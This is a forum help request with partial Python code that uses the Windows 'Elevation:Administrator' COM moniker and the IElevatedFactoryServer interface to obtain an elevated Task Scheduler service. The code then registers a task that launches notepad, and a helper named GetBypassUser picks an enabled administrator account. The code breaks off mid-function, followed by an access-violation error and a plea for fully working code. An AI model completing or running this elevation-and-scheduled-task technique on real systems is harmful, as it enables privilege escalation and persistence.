[Python] 纯文本查看 复制代码# coding=utf-8
import contextlib
import ctypes
import win32api
import windows
import win32ts
import win32net
from windows.generated_def.winstructs import UNICODE_STRING
from ctypes import wintypes
from typing import Optional, List
from windows.generated_def.interfaces import COMInterface, generate_IID, HRESULT, REFIID, POINTER, PVOID, ULONG, \
REFCLSID, DWORD, LPWSTR
task_xml = r'''
ttt
[Tr]
2024-12-07T09:12:27.509101
true
1
[/Tr]
LeastPrivilege
[U]{username}[/U]
InteractiveToken
IgnoreNew
true
true
true
false
false
[I]
PT10M
PT1H
true
false
[/I]
true
true
false
false
false
P3D
7
notepad.exe
'''
class BIND_OPTS3(ctypes.Structure):
_fields_ = [
("cbStruct", wintypes.DWORD),
("grfFlags", wintypes.DWORD),
("grfMode", wintypes.DWORD),
("dwTickCountDeadline", wintypes.DWORD),
("dwTrackFlags", wintypes.DWORD),
("dwClassContext", wintypes.DWORD),
("locale", wintypes.LCID),
("pServerInfo", ctypes.POINTER(windows.generated_def.winstructs.COSERVERINFO)),
("hwnd", wintypes.HWND),
]
class IElevatedFactoryServer(COMInterface):
IID = generate_IID(0x804BD226, 0xAF47, 0x04D71, 0xB4, 0x92, 0x44, 0x3A, 0x57, 0x61, 0x0B, 0x08,
name="IElevatedFactoryServer", strid="A6BFEA43-501F-456F-A845-983D3AD7B8F0")
IElevatedFactoryServer._functions_ = {
# QueryInterface -> riid:REFIID, ppvObject:**void
"QueryInterface": ctypes.WINFUNCTYPE(HRESULT, REFIID, POINTER(PVOID))(0, "QueryInterface"),
# AddRef ->
"AddRef": ctypes.WINFUNCTYPE(ULONG)(1, "AddRef"),
# Release ->
"Release": ctypes.WINFUNCTYPE(ULONG)(2, "Release"),
# ServerCreateElevatedObject -> rclsid:REFCLSID, riid:REFIID, ppvObject:**void
"ServerCreateElevatedObject": ctypes.WINFUNCTYPE(HRESULT, REFCLSID, REFIID, POINTER(PVOID))(3,
"ServerCreateElevatedObject"),
}
CoGetObject = ctypes.windll.ole32.CoGetObject
CoGetObject.argtypes = [
wintypes.LPCWSTR,
ctypes.POINTER(BIND_OPTS3),
REFIID,
ctypes.POINTER(ctypes.c_void_p)
]
CoGetObject.restype = HRESULT
class UserUtils:
@classmethod
def GetBypassUser(cls) -> str:
loginUserName = cls._GetLoginUser() # Access instance methods via class
if not loginUserName:
return win32api.GetUserName()
adminUsers = cls._GetEnabledAdminUsers()
if loginUserName in adminUsers:
return loginUserName
if len(adminUsers) > 0:
return adminUsers[0]
return loginUserName
@staticmethod
def _IsUserDisabled(username):
with contextlib.suppress(Exception):
user_info = win32net.NetUserGetInfo(None, username, 1)
if user_info['flags'] & 0x0002:
return True
return False
@staticmethod
def _GetEnabledAdminUsers() -> List:
adminUsers = []
with contextlib.suppress(Exception):
members, total, new_resume_handle = win32net.NetLocalGroupGetMembers(None, "administrators", 1, 0, 4096)
for member in members:
name = member['name']
if UserUtils._IsUserDisabled(name):
continue
adminUsers.append(name)
return adminUsers
@staticmethod
def _GetLoginUser() -> Optional[str]:
buffer = LPWSTR()
bufferSize = DWORD(0)
ret = ctypes.windll.wtsapi32.WTSQuerySessionInformationW(win32ts.WTS_CURRENT_SERVER_HANDLE,
win32ts.WTS_CURRENT_SESSION, win32ts.WTSUserName,
ctypes.byref(buffer), ctypes.byref(bufferSize))
if ret == 0:
return None
return buffer.value
def GetElevatedFactoryServerAndTaskService(iElevatedFactoryServer: IElevatedFactoryServer,
iTaskService: windows.generated_def.interfaces.ITaskService) -> bool:
IID_ElevatedFactoryServer = windows.com.IID.from_raw(0x804BD226, 0xAF47, 0x04D71, 0xB4, 0x92, 0x44, 0x3A, 0x57,
0x61, 0x0B,
0x08)
bop = BIND_OPTS3()
ctypes.memset(ctypes.pointer(bop), 0, ctypes.sizeof(BIND_OPTS3))
bop.cbStruct = ctypes.sizeof(BIND_OPTS3)
bop.dwClassContext = windows.generated_def.CLSCTX_LOCAL_SERVER
szMoniker = ctypes.create_unicode_buffer("Elevation:Administrator!new:{A6BFEA43-501F-456F-A845-983D3AD7B8F0}")
hr = CoGetObject(szMoniker, ctypes.byref(bop), ctypes.byref(IID_ElevatedFactoryServer),
ctypes.byref(iElevatedFactoryServer))
if hr != windows.generated_def.S_OK:
return False
if not iElevatedFactoryServer.value:
return False
print("[+] CoGetObject Success")
CLSID_TaskScheduler = windows.com.IID.from_string("0F87369F-A4E5-4CFC-BD3E-73E6154572DD")
IID_ITaskService = windows.com.IID.from_string("2FABA4C7-4DA9-4013-9697-20CC3FD40F85")
hr = iElevatedFactoryServer.ServerCreateElevatedObject(ctypes.byref(CLSID_TaskScheduler),
ctypes.byref(IID_ITaskService),
ctypes.byref(iTaskService))
if hr != windows.generated_def.S_OK:
return False
if not iTaskService.value:
return False
return True
def RegisterTask(taskService: windows.generated_def.interfaces.ITaskService, taskName: str, description: str,
username: str, command: str, arguments: Optional[str] = None):
varDummy = windows.generated_def.VARIANT()
hr = taskService.Connect(varDummy, varDummy, varDummy, varDummy)
if hr
报错为
[+] CoGetObject Success
[+] GetElevatedFactoryServerAndTaskService Success
File "D:/test.py", line 226, in RegisterTask
windows.generated_def.TASK_LOGON_INTERACTIVE_TOKEN, name, ctypes.byref(pTask))
OSError: exception: access violation reading 0x00000250B714FFF0
如果成功将创建一个名为test的计划任务,并且弹出记事本。我必须使用这个函数的 pTaskFolder.
[color=]RegisterTask
,求能完整通过的代码,吾爱币不够可以再加,运行的时候可能会弹出uac框,需要点击“是”
